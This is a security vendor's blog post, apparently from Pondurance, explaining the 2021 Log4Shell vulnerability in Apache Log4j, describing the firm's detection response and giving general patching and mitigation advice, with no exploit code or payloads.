December 9th, 2021 may turn out to be one of those days that, a decade from now, you remember where you were and what you were doing when you heard the news: A high-severity vulnerability was discovered in Log4j, an open-source Java logging library developed by the Apache Foundation.
What has made this zero-day vulnerability so special? We hear of significant cyberattacks on an almost daily basis, but why is Log4Shell—the name of this vulnerability—rated a 10-out-of-10 in severity?
Well… do you have a kid addicted to Minecraft? Do you use Amazon, Steam, Twitter, LinkedIn or an iPhone? Do you drive a Tesla? Uh oh… you get the gist. The problem with this particular exploit is that, according to ZDNet, “Basically any device that’s exposed to the internet is at risk if it’s running Apache Log4j, versions 2.0 to 2.14.1.” Log4j is used by many organizations for their Java programs for server and client applications. To give you a sense of how popular the Log4j library is with developers, you need to look no further than the helpful and comprehensive list of “all known vulnerable and not vulnerable software” posted by the Netherland’s National Cyber Security Centrum (NCSC). Suffice to say, the list of “vulnerable” software is overwhelming.
You can’t blame developers for using open-source libraries like Log4j. Using open-source software can dramatically speed up the application development process and, in today’s digital world, speed and agility are rewarded with fast time-to-market and competitive advantage. According to Boston Consulting Group (BCG), “As many as 80% of IT departments plan to increase their use of open-source software over the next 12 months, with 95% of IT specialists agreeing that open source has become strategically important.” In the same blog where this was reported, BCG went on to say that, “In 2020, over 56 million developers worked on the 140 million projects listed on GitHub, the leading platform for open source collaboration”. But—as Log4Shell reminds us—open-source software and libraries can bring with them risks that could potentially open flood gates to bad actors.
In fact, since the revelation of a proof-of-concept (POC) exploit code for Log4j, threat actors have been acting like kids in a candy store, racing to develop their own exploits to load DDoS malware, trojans, cryptominers and ransomware, with Khonsari being the newest group. This threat is on track to be even bigger than Heartbleed was when it was disclosed in April 2014, with over 50 variants of the Log4j exploit already weaponized and being used in the wild.
Our Security Experts Are Your Front Line
As a Managed Detection and Response (MDR) services provider committed to stopping security incidents before they can do harm to our clients’ organizations, we kicked into high gear the moment the Log4Shell vulnerability was discovered and we started detecting probing and exploitation attempts. Our experienced team of security analysts, threat hunters and incident responders knew they were seeing something new and scary, and immediately began taking action to protect Pondurance clients from the threat.
The security experts that staff the Pondurance Security Operations Center (SOC) 24/7/365 communicate with clients continually through the Scope platform, which provides clients with a window into the security services, information, threat intelligence, data and analytics being provided by Pondurance. It was here that we began communicating what we were seeing with Log4Shell, and where we can receive and respond to specific questions or concerns as they arise.
Some of the immediate actions we’re taking and have communicated to clients through Scope include:
- On the network side, we have network signatures and analytics in place to detect identified scanning payloads and uncover exploitation attempts. The SOC has created a dashboard to track these attempts.
- Within our log service, we are actively reviewing available applicable logs to identify exploit and scan attempts, looking closely at network connections to see if any of the payloads are being successfully executed, and separating out real issues from false alarms.
- New Nessus plugins were released, and we installed them to aid in the identification of affected systems. Due to the risk and severity of Log4Shell, Pondurance will be rescanning its clients’ external environments using the updated set of plugins, and we will notify clients of any critical findings related to this vulnerability. (These actions are taken as part of our Vulnerability Management Program, a key element of our MDR services.)
What Can You Do Now?
As far as remediating the Log4Shell vulnerability is concerned, the key action for you to take is patching. The initial patch released by Apache was unfortunately incomplete and also found vulnerable, but the latest patch release, Log4j 2.16.0, is now available and appears to have fixed any outstanding issues.
A few other tips:
- Apply recommend patching as soon as it becomes available from your vendors
- Consult with all third-party vendors regarding their exposure for the Log4j vulnerabilities
- For in-house Java applications, upgrade the Log4j library to version 2.16.0
- If possible, utilize your existing web application firewall (WAF) to block payloads (although threat actors can utilize obfuscation)
- If possible, block outbound LDAP queries in your firewall
- If patching is not possible for whatever reason, we strongly recommend isolating the system from the Internet. Apache also suggested some mitigation steps if you can’t patch.
From the perspective of Incident Response, keep in mind that there will be lingering effects of the vulnerability’s existence that persist post-mitigation/patching. Right now, opportunistic attackers are using this vulnerability to plant backdoors everywhere they can, with the plan to exploit their access in the future. Mitigation and patching aren’t sufficient on their own; you need to perform a compromise assessment of affected systems following mitigation before you can be fully confident that the risk has been addressed.
The Log4Shell vulnerability is being covered extensively by the media right now, as well it should be. The key thing we want to convey to our clients is that we’re on it; this is a terrible exploit, but the team in the Pondurance SOC has the tools to monitor what’s happening, the combination of technology and human intelligence to mitigate the threat and the incident response know-how to help you weather this storm should you “fall victim”. If you’re a Pondurance client, pay close attention to what we communicate through Scope, and be in touch with your own questions and concerns.
Resources You Should Check Out
We’ll keep providing updates as necessary to address the Log4Shell situation, but a couple of good resources worth checking out include:
- The Cybersecurity & Infrastructure Security Agency, or CISA, which has created a web page with lots of helpful links and specific guidance on how to address this extremely critical vulnerability. It’s worth noting that Pondurance Board Chair, Niloofar Razi Howe, was recently named to the CISA Cybersecurity Advisory Committee (CSAC).
- Crowell & Moring LLP, an international law firm with specific expertise in cybersecurity, will be hosting the webinar “The Log4j Vulnerability: What You Need to Know to Protect Your Business”, on Friday, December 17, 2021 at 12:00pm ET. Leaders from Pondurance will be part of an expert panel discussing what companies need to do to respond to this threat, and how to stay ahead of it. Interested parties can register here to attend.
We can’t sugar-coat the Log4Shell vulnerability—it’s bad. In the same way some people are compelled to combat disease by becoming doctors or medical researchers, and others are driven to serve their communities through non-profits, the team at Pondurance is committed to fighting cyber threats with you.